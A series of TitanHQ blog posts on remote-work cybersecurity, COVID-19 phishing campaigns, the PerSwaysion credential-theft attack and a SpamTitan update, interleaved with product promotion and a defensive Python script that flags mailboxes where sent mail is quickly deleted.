When employees are office based and logged on to the network, identifying shadow IT – unauthorized software and hardware used by employees – is easier. When employees work from home, the issue not only becomes harder to identify, but the risk of unauthorized software being installed onto corporate-issued devices also increases.
Software installed on work computers carries a risk of a malware infection and potentially offers an easy way to attack the user’s device and the corporate network. IT teams will have little knowledge of unauthorized software on users’ devices and whether it is running the most recent version and has been patched against known flaws. It is important to cover shadow IT in security awareness training for remote workers and to make it clear that no software should be downloaded to work devices and that personal USB devices should not be used on corporate devices without the go-ahead being given from the IT department.
The COVID-19 pandemic has seen many workers turn to teleconferencing software to communicate with the office, friends, and family. One of the most popular teleconferencing platforms is Zoom. Malicious installers have been identified that install the genuine Zoom client but have been bundled with malware. Installers have been discovered that also install adware, Remote Access Trojans, and Coinminers.
How TitanHQ Can Be Used
Many security awareness training firms have made resources available to businesses free of charge during the COVID-19 crisis to help them educate the workforce, such as the SANS Institute. Take advantage of these resources and share them with your workforce. If you are a small SMB, you may also be able to get access to free phishing simulation emails to test the workforce and reinforce training.
TitanHQ can’t help you with your cybersecurity awareness training, but we can help by seeing to it that employees have to deal with fewer threats by protecting against email and web-based attacks.
SpamTitan is an advanced and powerful cloud-based email security solution that will safeguard remote workers from phishing, spear phishing, malware, virus, and ransomware attacks by blocking attacks at source and stopping the threats from reaching inboxes. SpamTitan features dual anti-virus engines to safeguard against known malware threats and sandboxing to block unknown (zero-day) malware threats. SpamTitan incorporates many real-time threat intelligence feeds to block current and emerging phishing attacks, and machine learning technology detects and blocks previously unseen phishing threats. SpamTitan has been designed to work seamlessly with Office 365 to allow businesses to set up layered defenses, augmenting Microsoft’s protections and adding advanced threat detection and blocking capabilities.
WebTitan is a DNS filtering solution that will safeguard all workers from web-based attacks, no matter where they access the internet. WebTitan uses zero-minute threat intelligence and blocks malicious domains and webpages as soon as they are discovered. The solution can also be used to carefully manage the types of websites that remote workers can access on their corporate-owned devices, via keyword and category-based controls. WebTitan can also be set up to block the downloading of malicious files and software installers to manage shadow IT.
For more details on protecting your business during the COVID-19 crisis, to set up a product demonstration of SpamTitan and/or WebTitan, and to register for a free trial of either solution to allow you to start instantly protecting against email and web-based dangers get in touch with TitanHQ now!
A new phishing campaign has been discovered that uses the Microsoft Sway file sharing service in a three-stage attack to steal the Office 365 credentials of high-level executives. Group IB experts identified the campaign and labelled it PerSwaysion, although versions of the attack have been identified that have used OneNote and SharePoint. The campaign is highly focused and has targeted high-level executives at more than 150 firms. The individuals behind the campaign are believed to be based in Nigeria and South Africa, with the earliest traces of the attacks indicating the campaign has been operational since around the middle of last year.
The PerSwaysion attack begins with a spear phishing email sent to an executive in the targeted group. The phishing emails include a PDF file attachment with no malicious code embedded. The PDF file just includes a link that the user must click to view the content of the file. The link brings the user to a file on a Microsoft Sway page, which also requires them to click a link to view the content. Microsoft Sway allows the previewing of the document and shows the content without the user having to open the document. The document states the name of the sender – a known contact – and that individual’s email address with the message that a file has been shared for review and also a hyperlink with the text ‘Read Now’. Clicking the link directs the user to a phishing page with an Office 365 Single Sign-on login prompt.
The initial PDF file, Microsoft Sway page, and the login prompt on the phishing page all have Microsoft Office 365 logos, and it is easy to see how many victims would be fooled into sharing their credentials.
Once credentials have been gathered, they are used the same day to access the Office 365 account, email data is copied from the account, and it is then used to broadcast further spear phishing emails to individuals in the victim’s contact list. The sent emails are then erased from the victim’s sent folder to ensure the attack is not discovered by the victim.
The emails include the sender’s name in the subject line, and since they have been sent from the account of a known contact, they are more likely to be clicked on. The lure used is simple yet successful, asking the recipient to open and review the shared document.
Many of the attacks have been targeted at individuals at companies in the financial services sector, although law firms and real estate companies have also fallen victim. Most attacks have been conducted in the United States and Canada, United Kingdom, Netherlands, Germany, Singapore, and Hong Kong.
It is possible that the cybercriminals are still accessing the compromised email accounts to take sensitive data. Since the campaign targets high-level executives, the email accounts are likely to include valuable intellectual property. They could also be used for BEC scams to fool employees into completing fraudulent wire transfers.
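A defender's check for the post-compromise behaviour described above (mail sent to the victim's contacts, then erased from the sent folder), as an added example that is not part of the original article. It pairs send and delete events per mailbox over constructed audit records; the record schema, field names and thresholds are assumptions to map onto your own mailbox audit log export.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Operations treated as "message removed" (assumed names; adjust to your log source).
DELETE_OPS = {"SoftDelete", "HardDelete", "MoveToDeletedItems"}


def _ev(ts, user, op, msg_id, ip, folder=None, rcpt=None):
    """Build one constructed audit record with the simplified schema used here."""
    return {"CreationTime": ts, "UserId": user, "Operation": op,
            "InternetMessageId": msg_id, "ClientIP": ip,
            "Folder": folder, "Recipients": rcpt or []}


# Constructed sample data: one mailbox showing send-then-erase, plus benign noise.
SAMPLE_EVENTS = [
    _ev("2020-05-04T14:02:00", "cfo@example.com", "Send", "<m1>", "203.0.113.50", rcpt=["a@partner.example"]),
    _ev("2020-05-04T14:02:40", "cfo@example.com", "Send", "<m2>", "203.0.113.50", rcpt=["b@partner.example"]),
    _ev("2020-05-04T14:03:10", "cfo@example.com", "Send", "<m3>", "203.0.113.50", rcpt=["c@partner.example"]),
    _ev("2020-05-04T14:04:00", "cfo@example.com", "HardDelete", "<m1>", "203.0.113.50", folder="Sent Items"),
    _ev("2020-05-04T14:04:05", "cfo@example.com", "HardDelete", "<m2>", "203.0.113.50", folder="Sent Items"),
    _ev("2020-05-04T14:04:10", "cfo@example.com", "SoftDelete", "<m3>", "203.0.113.50", folder="Sent Items"),
    # Benign: a single sent message tidied up shortly afterwards.
    _ev("2020-05-04T09:00:00", "alice@example.com", "Send", "<m4>", "198.51.100.7", rcpt=["x@example.com"]),
    _ev("2020-05-04T09:05:00", "alice@example.com", "SoftDelete", "<m4>", "198.51.100.7", folder="Sent Items"),
    # Benign: sent message deleted hours later, outside the pairing window.
    _ev("2020-05-04T10:00:00", "bob@example.com", "Send", "<m5>", "198.51.100.9", rcpt=["y@example.com"]),
    _ev("2020-05-04T13:00:00", "bob@example.com", "MoveToDeletedItems", "<m5>", "198.51.100.9", folder="Sent Items"),
    # Benign: deletion from the Inbox, never sent by this mailbox.
    _ev("2020-05-04T14:10:00", "cfo@example.com", "SoftDelete", "<m9>", "192.0.2.10", folder="Inbox"),
]


@dataclass
class Alert:
    mailbox: str
    message_count: int
    recipients: set
    client_ips: set
    first_send: datetime
    last_delete: datetime


def _ts(value):
    return datetime.fromisoformat(value)


def find_send_then_delete(events, max_gap=timedelta(minutes=30), min_messages=3):
    """Flag mailboxes where several sent messages were removed from Sent Items
    within max_gap of being sent."""
    sends = {}                 # (mailbox, message id) -> send event
    pairs = defaultdict(list)  # mailbox -> [(send event, delete event)]
    for ev in sorted(events, key=lambda e: _ts(e["CreationTime"])):
        msg_id = ev.get("InternetMessageId")
        if not msg_id:
            continue           # cannot correlate without a message id
        key = (ev["UserId"].lower(), msg_id)
        if ev["Operation"] == "Send":
            sends[key] = ev
        elif ev["Operation"] in DELETE_OPS and ev.get("Folder") == "Sent Items":
            sent = sends.get(key)
            if sent and _ts(ev["CreationTime"]) - _ts(sent["CreationTime"]) <= max_gap:
                pairs[key[0]].append((sent, ev))

    alerts = []
    for mailbox, matched in pairs.items():
        if len(matched) < min_messages:
            continue           # an isolated quick delete is normal user behaviour
        alerts.append(Alert(
            mailbox=mailbox,
            message_count=len(matched),
            recipients={r for s, _ in matched for r in s["Recipients"]},
            client_ips={e["ClientIP"] for pair in matched for e in pair},
            first_send=min(_ts(s["CreationTime"]) for s, _ in matched),
            last_delete=max(_ts(d["CreationTime"]) for _, d in matched),
        ))
    return alerts


if __name__ == "__main__":
    for alert in find_send_then_delete(SAMPLE_EVENTS):
        print(alert)
```

The client IPs collected in each alert can be compared against the mailbox owner's usual sign-in locations during triage.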
A new version of TitanHQ’s cloud-based anti-spam service and anti-spam software was made available on March 5, 2018. SpamTitan version 7.00 incorporates patches for recently identified flaws in the ClamAV antivirus engine and a change to the primary AV engine used by the solution.
The main anti-virus engine of SpamTitan version 7.00 is supplied by the Romanian firm Bitdefender. Bitdefender is an award-winning antivirus engine that provides strong email protection against malware, viruses, and ransomware. Combined with the secondary AV engine – ClamAV – users take advantage of excellent protection against email-based malware and ransomware attacks. The dual AV engines see to it that malicious software is not delivered to end users’ inboxes via email attachments.
The change to Bitdefender was the obvious choice and TitanHQ is planning to further its strategic relationship with the Romanian cybersecurity business over the coming weeks and months. The amendment to the primary AV engine will be unnoticeable to existing users, who will still be protected from malicious threats.
The update to the most recent version will not happen automatically. Customers who have ‘prefetch of system updates’ enabled on their SpamTitan installations will be able to see the newest version in their list of available updates and can manually trigger the update to the new version. Customers who do not have that option turned on need to “check for updates” via their user interface.
Customers have been advised to review the documentation accompanying the latest version before installation as it includes important information on how the update should be applied. TitanHQ explains that it is not possible to update from v4 or v5 of the platform to SpamTitan version 7.00 without initially installing version 6 of the platform.
Customers should remember that the update must be applied before May 1, 2018 to ensure continued protection, as support for the Kaspersky AV engine – used in all versions of SpamTitan prior to v7 – will come to an end on that date. TitanHQ has also informed customers that support for v4 and v5 of SpamTitan will also cease from May 1, 2018.
SpamTitan v7.00 includes patches for the following flaws: CVE-2017-12374, CVE-2017-12375, CVE-2017-12376, CVE-2017-12377, CVE-2017-12379, CVE-2017-12380. All of those flaws exist in ClamAV. The most recent version also improves protection against DoS attacks and should be run as soon as possible. The update will take around 10-20 minutes to run.
During this unprecedented time of uncertainty, the health and safety of our staff, clients, partners and their families is one of our main focuses and concerns. Team TitanHQ are dedicated to supporting our partners and customers. The advantages provided by our email and web security products are even more relevant and crucial now.
Our fantastic team has met the challenge with vigor and we have mobilized our workforce so that it’s business as usual over this unusual period of time. We are taking counsel from the government on best practice and have a task force in place to manage our work.
Customers and partners can rest assured that support teams will continue to be available and product teams are working as normal. If you have any queries or concerns about products, or technical support, please contact us as you normally would. The support team has been trained to be aware of special customer concerns during this pandemic and will escalate any question to the relevant responsible person or department.
We are conscious that this is a sensitive time and we will do everything we can to make it easier for our customers. All of us at TitanHQ wish you good health and thank you for your continued business.
Healthcare providers are being targeted by spammers using COVID-19 phishing campaigns, with the attacks showing no sign of letting up. The volume of attacks has led the U.S. Federal Bureau of Investigation (FBI) to release a further warning to healthcare providers urging them to take steps to safeguard their networks and prevent the attacks.
The first significant COVID-19 themed phishing attacks targeting healthcare providers began being detected by around March 18, 2020. The attacks have increased over the following weeks and the lures have diversified.
Campaigns have been carried out targeting at-home healthcare staff who are supplying telehealth services to patients, and there has been an increase in business email compromise campaigns. The latter see vendors impersonated and requests issued for early or out-of-band payments due to struggles that are being experienced due to COVID-19.
The phishing attacks are being run to obtain login details and to spread malware, both of which are used to gain a foothold in healthcare networks to allow follow-on system exploitation, persistence, and the theft of sensitive data.
The malware being shared in these campaigns is very varied and includes data stealers such as Lokibot, backdoors, and Trojans such as Trickbot. Microsoft has recently revealed that Trickbot accounts for the majority of COVID-19 phishing emails targeting Office 365 users, with a campaign last week involving hundreds of different, unique macro-laced files. Along with being a dangerous malware variant in its own right, Trickbot also installs other malicious payloads, including RYUK ransomware.
While the amount of COVID-19 themed phishing emails has been on the rise, the overall volume of phishing emails has not increased by a significant amount. What is happening is threat actors are changing their lures and are now using COVID-19 lures as they are more likely to be clicked on.
The campaigns can be highly realistic. The lures and requests are believable, many of the emails are well written, and authorities on COVID-19 such as the Centers for Disease Control and Prevention, the HHS’ Centers for Medicare and Medicaid Services, and the World Health Organization have been tricked by this. In a lot of cases the emails are sent from a known individual and trusted contact, which makes it more probable that the email attachment will be opened.
The advice provided by the FBI is to follow cybersecurity best practices such as never clicking on unsolicited email attachments, regardless of who appears to have shared the email. Ensuring software is kept up to date and patches are applied quickly is also vital, as is disabling automatic email attachment downloads. The FBI has also recommended filtering out specific types of attachments using email security software, something that is easy to set up with SpamTitan.
The FBI has emphasised the importance of not opening email attachments, even if antivirus software indicates that the file is clean. As the Trickbot campaign shows, new strains of malicious documents and scripts are being created at an incredible rate, and signature-based detection methods cannot keep up with the pace. This is another area where SpamTitan can be of assistance. Along with using dual antivirus engines to detect known malware variants faster, SpamTitan includes sandboxing to identify and obstruct zero-day malware threats that have yet to have their signatures added to antivirus software virus definitions lists.
Training is crucial to show healthcare employees cybersecurity best practices to help them spot phishing emails, but it is also important to ensure that your technical controls are in a position to block these threats. For more guidance get in touch with TitanHQ now.
To assist those who are working remotely during the COVID-19 pandemic, we have compiled a set of cybersecurity best practices for home workers to help IT teams prepare for a massive rise in telecommuting.
The cybersecurity protections at home will not be as strong as protections in the office, which are much easier to implement and maintain. IT departments will therefore need to advise telecommuting workers on cybersecurity best practices for home working, and their devices will need to be set up to access applications and work resources securely. With so many workers having to telecommute, this will be a massive challenge.
The coronavirus pandemic has forced businesses to quickly grow the number of telecommuting workers, and having to increase capacity in such a short space of time increases the potential for errors. Additionally, testing may not be nearly as stringent as necessary given the time pressure IT staff are under. Their teams too are likely to be much smaller due to self-isolating workers.
One area where standards are likely to fall is staff training on IT. Many staff will be working from home for the first time and will have to use new methods and applications they will not be used to. The lack of familiarity can easily lead to errors being made. It is important that even though resources are restricted you still teach cybersecurity best practices for home workers. Do not think that telecommuting workers will be aware of the steps they must take to work safely away from the office.
Measures for IT Teams to Implement to Enhance Cybersecurity for Home Workers
Listed here are some of the main steps that IT teams need to take to improve security for employees that must now work from home.
Check VPNs are Provided and Updated
Telecommuting workers should not be allowed to access their work environment unless they use a VPN. A VPN will ensure that all traffic is encrypted, and data cannot be captured in transit. Enterprise-grade VPNs should be used as they are more robust and provide stronger security. Ensure there are sufficient licenses for all workers, and you have enough bandwidth available. You must also make sure that the VPN is running the most recent software version and patches are applied, even if this means some downtime to apply the updates. VPN vulnerabilities are under active attack.
Configure Firewalls for Remote Workers
You will have a firewall in place at the office and remote workers must have similar security measures in place. Software firewalls should be set up to protect remote workers’ devices. Home routers may have inbuilt firewalls. Show employees how to enable hardware firewalls if they have them on their home routers and ensure that passwords are set to stop unauthorized individuals from logging on to their home Wi-Fi network.
Use the Rule of Least Privilege
Remote workers bring with them new risks, and with large sections of the workforce telecommuting, that risk is considerable. Remote workers are being targeted by cybercriminals through web- and email-based attacks. In the event of a malware infection or credential theft, damage can be limited by ensuring workers only have access to resources absolutely vital for them to perform their work duties. If possible, limit access to sensitive systems and data.
Ensure Strong Passwords are Being Used
To safeguard from brute force attacks, ensure good password practices are being adhered to. Consider using a password manager to help employees remember their passwords. The use of complex passwords should be policed.
Enable Multifactor Authentication
Multifactor authentication should be enabled on all applications that are accessed by remote workers. This measure will ensure that if credentials are compromised, system access is not allowed unless a second factor is provided.
Ensure Remote Workers’ Devices Have Antivirus Software Configured
Antivirus software must be configured on all devices that are allowed to connect to work networks and the solutions must be set to update automatically.
Set Windows Updates to Automatic
Working remotely makes it more difficult to monitor user devices and perform updates. Ensure that Windows updates are set to take place automatically outside of office hours. Instruct workers to leave their devices on to permit updates to take place.
Use Cloud-Based Backups
To stop accidental data loss and to protect against ransomware attacks, all data must be backed up. By using cloud-based backups, in the event of data loss, data can be brought back online from the cloud-backup service.
Use Cybersecurity Best Practices for Home Workers
All telecommuting workers must be shown how they need to access their work environment securely when working away from the office. Reinforce IT best practices with home workers, provide training on the use of VPNs, provide training on cybersecurity dos and don’ts when working remotely, and explain procedures for reporting problems.
Define Procedures for Dealing with a Security Incident
Members of the IT team are also likely to be working remotely so it is essential that everyone is aware of their role and responsibilities. In the event of a security incident, workers should have clear procedures to follow to ensure the incident is resolved quickly and efficiently.
Implement a Web Filter
A web filter will help to protect against web-based malware attacks by blocking access to malicious websites and will help to prevent malware downloads and the installation of shadow IT. Also consider applying content controls to limit employee activities on corporate-owned devices. Drive-by malware attacks have grown and the number of malicious domains registered in the past few weeks has gone up rapidly.
Use Encrypted Communication Channels
When you need to speak or exchange private messages with telecommuting workers, ensure you have secure communications channels to use where sensitive information cannot be intercepted. Use encryption for email and secure text message communications, such as Telegram or WhatsApp.
Ensure Your Email Security Controls are Appropriate
One of the main cybersecurity best practices for home workers is to take additional care when opening emails. Phishing and email-based malware attacks have increased massively during the coronavirus pandemic. Ensure training is given to help employees spot phishing emails and other email dangers.
Think about augmenting email security to see to it that more threats are blocked. If you use Office 365, a third-party email security solution layered on top will give much better security. Exchange Online Protection (EOP) is unlikely to give the level of protection you need against phishing and zero-day malware attacks. Consider an email security solution with data loss protection functions to keep you safe from insider threats.
Search for Unauthorized Access
More devices linked to work environments make it much simpler for threat actors to disguise malicious activity. Make sure monitoring is increased. An intrusion detection system that can spot anomalous user behavior would be a wise investment.
For more information on enhancing email security and web filtering to safeguard remote workers during the coronavirus pandemic, contact TitanHQ now.
The COVID-19 pandemic has forced businesses to rapidly scale up remote working. Before the 2019 Novel Coronavirus outbreak, many employees were spending some of the week working remotely but now businesses have had to allow virtually the entire workforce to work from home. While there are signs that the lockdown measures are having an effect and the number of new cases is starting to level off, it is likely to be some time before lockdowns are eased and life can return to normal. Even when governments start to ease restrictions, it is likely that most employees will have to continue to work from home for many more months.
Protecting a Remote Workforce from Cybersecurity Threats
At TitanHQ, we have seen the number of COVID-19 and Novel Coronavirus-themed phishing emails steadily grow over the past few weeks. Now, huge numbers of phishing emails are being sent that use COVID-19 as a lure to get remote workers to divulge their credentials or install malware. The email campaigns are highly varied, with some of the most common lures being the offer of a cure, information on how to protect against infection, advice to avoid transmission of the virus, and offers of the latest data on local cases.
One of the problems for IT departments is employees want all this information, so there is a high chance of at least some of those messages being opened by employees if they arrive in inboxes. Infected email attachments may be opened and clicks on links will see employees visit phishing websites where credentials are harvested or malware is downloaded.
Entire households are self-isolating together and schools are closed. Demands are being placed on employees that do not exist in the office, which means that concentration lapses are likely to occur, and that increases the chance of a response to a phishing email.
It is therefore important for businesses to take steps to reduce risk. Cybersecurity awareness training for the workforce is critical to make employees aware of the threat of cyberattacks while they are working remotely and to reinforce education on cybersecurity best practices when working remotely. It is also essential for cybersecurity measures to be implemented that can reduce the risk of employees encountering a threat, and make sure that threats are neutralized if they are delivered.
Two Cybersecurity Solutions to Improve Protection for Remote Workers
There are two important cybersecurity solutions that can help in this regard. A powerful email security solution is required to improve the detection of phishing and malware threats and a web filtering solution to block attempts to visit malicious websites.
You will already have some email security measures in place to block spam and phishing emails, but for many businesses this will be the standard protections provided by Microsoft with Office 365. While Microsoft’s baseline level of security, provided through Exchange Online Protection, is reasonably effective at blocking spam email, it is far less effective at blocking phishing attacks and zero-day malware threats. Given the volume of phishing threats now targeting remote workers, you should consider bolstering your email security defenses by adding an additional layer of security on top of Exchange Online Protection.
SpamTitan Cloud is a powerful email security solution that will provide superior protection for Office 365. SpamTitan Cloud complements EOP and will improve protection against the full range of email threats, including zero-day threats that often sneak past EOP. SpamTitan Cloud scans inbound email and uses machine learning techniques to identify never-before-seen phishing threats, and uses outbound email scanning to detect already compromised mailboxes and block spamming and malware distribution. Malware protection is improved with dual antivirus engines and sandboxing to detect and block zero-day malware threats. SPF and DMARC are also incorporated to identify and block email impersonation attacks.
Protection from web-based threats is also important. WebTitan Cloud is a powerful DNS filtering solution that can be used to protect workers on or off the network. Businesses can apply filtering controls to prevent employees from visiting malicious websites and stop work-issued devices from being used to access risky websites and those that serve no work purpose. In addition to blocking malware downloads and curbing cyberslacking, the solution can also be used to prevent the installation of shadow IT – the downloading and installation of unauthorized software solutions.
Both of these solutions can be implemented by businesses and MSPs remotely without the need to install any clients. They are easy to implement and maintain, and both solutions are extremely well priced.
For further information on improving cybersecurity for your remote workers, give the TitanHQ team a call today.
Blackpoint Cyber has unveiled its Remote Reality LIVE conference, which will take place online on April 8th and April 9th 2020.
The conference will concentrate on managed service providers (MSPs) and how they can stay safe, profitable, and resilient as the world increases remote operations during the COVID-19 pandemic – registration and attendance are free. The two-day conference will feature sessions by former leaders of the United States’ government cyber security and intelligence communities as well as cyber security experts and business experts from the MSP services and technology sector.
Jon Murchison, Blackpoint’s CEO and founder, and former US government cyber operations specialist, explains the conference’s aim: “IT services and infrastructure have become mission critical for organizations to survive in this new economic landscape brought on by COVID-19. MSPs are the key to our success and, especially during these times, a collective national asset to their respective countries. That’s why we are bringing together experienced government and industry leaders to help MSPs navigate the current economic and security environments. We’re excited to provide one of the first online and socially-distanced conferences dedicated to MSPs and cyber security.”
Blackpoint has worked with leading technology, service, and marketing firms for the conference, such as:
Datto: leading global supplier of cloud-based software and technology solutions purpose-built for MSPs
Webroot: Cybersecurity Solutions Purpose-Built for MSPs and SMBs
Convergint: Global, Service-based Systems Integrator
Marketopia: Lead Generation and Marketing for Technology Businesses
ID Agent: Dark Web and Identity Theft Security
TitanHQ: Email and DNS Protection
Compliancy Group: HIPAA Compliance-as-a-Service
Atlantic Data Forensics: Leading Incident Response and Forensics
ProSource Technology Solutions: Leading Managed Service Provider
Corporate Office Properties Trust (COPT): Premier Real Estate Investment Trust
Michael Morell, former Deputy Director and Acting Director CIA, will provide the keynote session on national security implications of the Coronavirus Pandemic. While at the CIA, Mr. Morell was President George W. Bush’s daily intelligence advisor during the 9/11 attacks and was awarded the Distinguished Intelligence Medal, the CIA’s second highest honor.
Other former US government cyber security and intelligence-related speakers include: Bill Priestap, former FBI Assistant Director of Counterintelligence, Chris Inglis, Former Deputy Director of NSA, Dave Sears, former Commander and Navy SEAL, and Kevin Donegan, former United States Navy Vice Admiral and former commander of the US Navy’s 5th fleet out of Bahrain. Security and MSP sector leaders will also present informational sessions, such as lead generation in a virtual world, security in the MSP space, cyber security for commercial real estate, the threat landscape of remote workers, and others.
Matt Solomon, VP of Business Development & IT at ID Agent, said: “ID Agent is very excited to participate in one of the first virtual MSP events since in-person events have been taken off the schedule. MSPs still need education during this period and we are honored to be part of such an esteemed group of vendors.”
In addition to learning how to stay secure and prosper, conference attendees will also qualify for giveaways and prizes.
Blackpoint Cyber announced its Remote Reality LIVE conference, which will occur online April 8th and April 9th 2020.
The conference will focus on managed service providers (MSPs) and how they can stay secure, profitable, and resilient as the world increases remote operations during the COVID-19 pandemic – registration and attendance are free. The two-day conference will include sessions by former leaders of the United States’ government cyber security and intelligence communities as well as cyber security experts and business veterans from the MSP services and technology industry.
Blackpoint Cyber announces its virtual cyber security conference for MSPs – Remote Reality LIVE. Featuring a keynote from the former Acting Director of the CIA and sessions from tech giants Datto, Webroot, Marketopia, and more.
Jon Murchison, Blackpoint’s CEO and founder, and former US government cyber operations expert, explains the conference’s objective: “IT services and infrastructure have become mission critical for organizations to survive in this new economic landscape brought on by COVID-19. MSPs are the key to our success and, especially during these times, a collective national asset to their respective countries. That’s why we are bringing together experienced government and industry leaders to help MSPs navigate the current economic and security environments. We’re excited to provide one of the first online and socially-distanced conferences dedicated to MSPs and cyber security.”
Blackpoint has partnered with leading technology, service, and marketing firms for the conference, including:
Datto: leading global provider of cloud-based software and technology solutions purpose-built for MSPs
Webroot: Cybersecurity Solutions Purpose-Built for MSPs and SMBs
Convergint: Global, Service-based Systems Integrator
Marketopia: Lead Generation and Marketing for Technology Companies
ID Agent: Dark Web and Identity Theft Protection
TitanHQ: Email and DNS Security
Compliancy Group: HIPAA Compliance-as-a-Service
Atlantic Data Forensics: Premier Incident Response and Forensics
ProSource Technology Solutions: Leading Managed Service Provider
Corporate Office Properties Trust (COPT): Premier Real Estate Investment Trust
Michael Morell, former Deputy Director and Acting Director CIA, will present the keynote session on national security implications of the Coronavirus outbreak. While at the CIA, Mr. Morell was President George W. Bush’s daily intelligence briefer during the 9/11 attacks and was awarded the Distinguished Intelligence Medal, the CIA’s second highest honor.
Additional former US government cyber security and intelligence expert speakers include: Bill Priestap, former FBI Assistant Director of Counterintelligence, Chris Inglis, Former Deputy Director of NSA, Dave Sears, retired Commander and Navy SEAL, and Kevin Donegan, former United States Navy Vice Admiral and previous commander of the US Navy’s 5th fleet out of Bahrain. Security and MSP industry leaders will also present informational sessions, such as lead generation in a virtual world, security in the MSP space, cyber security for commercial real estate, the threat landscape of remote workers, and more.
Matt Solomon, VP of Business Development & IT at ID Agent, shares his sentiments on the conference: “ID Agent is very excited to participate in one of the first virtual MSP events since in-person events have been taken off the schedule. MSPs still need education during this period and we are honored to be part of such an esteemed group of vendors.”
In addition to learning how to stay secure and prosper, conference attendees will also be eligible for giveaways and prizes.
IT departments face a major challenge ensuring mobile devices used by remote workers are secured and that challenge has just got bigger as a result of the 2019 Novel Coronavirus pandemic with so many employees now working from home. To help IT departments manage security risks, we have compiled a cybersecurity checklist for remote workers detailing steps that can be taken to deal with the challenges of having a largely remote workforce.
Given time, IT departments can make sure mobile devices are configured correctly, are free from vulnerabilities, and have all the necessary software and security solutions installed to allow employees to securely work from home. Training can also be provided to remote workers to teach them cybersecurity best practices and how to practice good IT hygiene; however, the speed at which the 2019 Novel Coronavirus has spread has meant employers and their IT departments have had little time to prepare and have had to accommodate massive numbers of employees self-isolating and working from home.
Telecommuting Cybersecurity Risks
A massive increase in remote workers significantly increases the attack surface. Not only have many devices left the protection of corporate firewalls, additional software solutions have had to be installed to ensure workers can continue to be productive at home. Videoconferencing software is required, chat platforms need to be used to maintain contact, and VPNs are required to secure connections over the internet.
The cybersecurity risks introduced by telecommuting are considerable. Even solutions used to improve security can be turned against an organization. VPNs will ensure connections to work networks are secured, but if VPN credentials are compromised, attackers can use them to gain access to corporate networks undetected and VPNs can be turned into pipelines for delivering malware.
In 2019, several popular VPN solutions were found to contain critical vulnerabilities that allowed attackers to easily gain access to credentials. While patches were promptly developed and released to correct the flaws, many businesses failed to perform updates quickly. Even today, almost a year after the patches were released, some companies are still using vulnerable VPNs. Cybercriminals have been quick to take advantage and attacks on vulnerable VPNs have increased significantly.
When workers are in the office collaboration is easy. Close collaboration needs to be maintained when the majority of the workforce is working from home. IT teams must try to ensure the same communication tools that are used in the office are still available to remote workers. If not, employees will find their own ways of communicating, which may not provide the required level of security. If employees start using Google Drive for sharing files for instance, IT departments will lose visibility and will not be able to tell where sensitive data is being stored or transmitted.
With so many home workers due to the 2019 Novel Coronavirus and COVID-19, use of videoconferencing solutions has skyrocketed. Many platforms are now being used, although Zoom is one of the most popular choices. While this videoconferencing platform claims to offer end-to-end encryption, it has recently been discovered that Zoom’s interpretation of end-to-end encryption is different to other solution providers. While Zoom meetings are encrypted from Zoom client to Zoom client, Zoom has access to audio and video. Many companies have instructed their remote workers to stay in touch using Zoom but may now have to reconsider and use a platform with true end-to-end encryption. Vulnerabilities have also been identified in the platform in the past few days which could be exploited to gain access to sensitive data.
Phishing campaigns are being conducted to gain access to the credentials of remote workers. Cybercriminals are well aware that attacks are much easier on remote workers, and the large numbers of remote workers connecting to networks allows them to easily hide their malicious connections.
The COVID-19 crisis is likely to be a particularly stressful time for IT departments. While the cybersecurity risks increase with remote workers, it is possible to implement tools to manage risk effectively, protect sensitive data, and allow work to continue until life returns to normal again.
Internet Security and Telecommuting Workers
Working from home can be a challenge as there are many distractions that are not present in the office. It is often difficult for workers to separate work life from home life, and that applies to IT as well. Remote workers are likely to be tempted to use their work devices for personal internet use, rather than powering up their personal devices. It is important for policies to be established covering the allowable uses of company devices and those policies should be enforced. If corporate laptops are used for personal internet use, the risk of malware infections will increase.
The easiest way to enforce policies is with a web filtering solution. A web filter, such as WebTitan, allows IT teams to carefully control the online activities of employees and manage risk. With WebTitan in place, companies can enforce their acceptable internet usage policies and prevent their employees from visiting websites used for phishing and malware distribution. Since WebTitan integrates with Active Directory and LDAP, IT teams can easily monitor the online activities of each employee, identify potentially risky behavior in real time and take action to address those risks.
Rise in Phishing Attacks Warrants Email Security Improvements
The 2019 Novel Coronavirus pandemic has provided cybercriminals with many opportunities for conducting phishing attacks and distributing malware. The first major coronavirus-themed phishing campaigns were detected in January 2020 and in the weeks that have followed the volume of messages has soared. People want up to date information on COVID-19 cases in their local area and advice on protecting against infection. Cybercriminals have been all too happy to oblige.
The campaigns we have identified have included highly convincing scams impersonating authorities such as the Centers for Disease Control and Prevention and the World Health Organization. The emails claim to offer important advice and updates about the Novel Coronavirus and COVID-19 but install malware and steal credentials. Remote workers are being targeted with emails spoofing their own HR departments, telling them about new protocols that must be adopted following infections in the office. A day doesn’t go by without another phishing scam being uncovered.
The increase in phishing attacks coupled with the rise in remote workers means steps should be taken to improve email security, especially for Office 365 accounts, which are being targeted by cybercriminals. While standard Office 365 email security provided by Exchange Online Protection (EOP) may have been sufficient to protect against low level phishing attacks, the increase in targeted attacks means greater protection is now required. Businesses should consider adding another layer of protection with a third-party email security solution such as SpamTitan. In contrast to EOP, SpamTitan offers sandboxing to protect against zero-day malware threats and provides superior protection against phishing and spear phishing attacks.
Employer Cybersecurity Checklist for Remote Workers
Employers and IT departments can take several steps to reduce cybersecurity risks for remote workers. We hope this cybersecurity checklist for remote workers will help you to identify and address cybersecurity risks.
Ensure a VPN client is installed on remote workers’ devices, that it is updated to the latest version, and remote workers have been trained how to use the VPN
Restrict access to resources that are not required by workers and use the principle of least privilege
Block the use of USB devices on remote users’ devices
Get remote workers to check their Wi-Fi connection is secure, that a strong password has been set, and encryption is enabled.
Set up systems to recognize probes and packet sniffers
Implement encryption on devices to protect data at rest
Ensure software is kept up to date and patches are applied promptly
Ensure antivirus software is installed on all users’ devices and it is set to update automatically. Perform regular scans to identify malicious code
Make sure all data is backed up to protect against accidental loss and to ensure recovery is possible in the event of a ransomware attack
Ensure screens are set to lock after a period of inactivity to prevent devices and data from being accessed by unauthorized individuals.
Augment email security and create layered defenses to protect against phishing attacks
Implement a web filter to prevent workers from accessing malicious websites
Use cloud applications for sharing sensitive data with remote workers rather than email
Provide ongoing security awareness training to employees to make sure they are aware of the cybersecurity risks for remote workers and are taught how to identify phishing and other threats
Ensure complex passwords are set and password policies are enforced
Enable multifactor authentication for email and cloud applications. If credentials are compromised, access will not be permitted without an additional authentication factor
Set computer use policies for remote employees. Make sure employees are aware that corporate devices can only be used for work purposes
Ensure support is always available for remote workers and prioritize support for remote access solutions and security issues
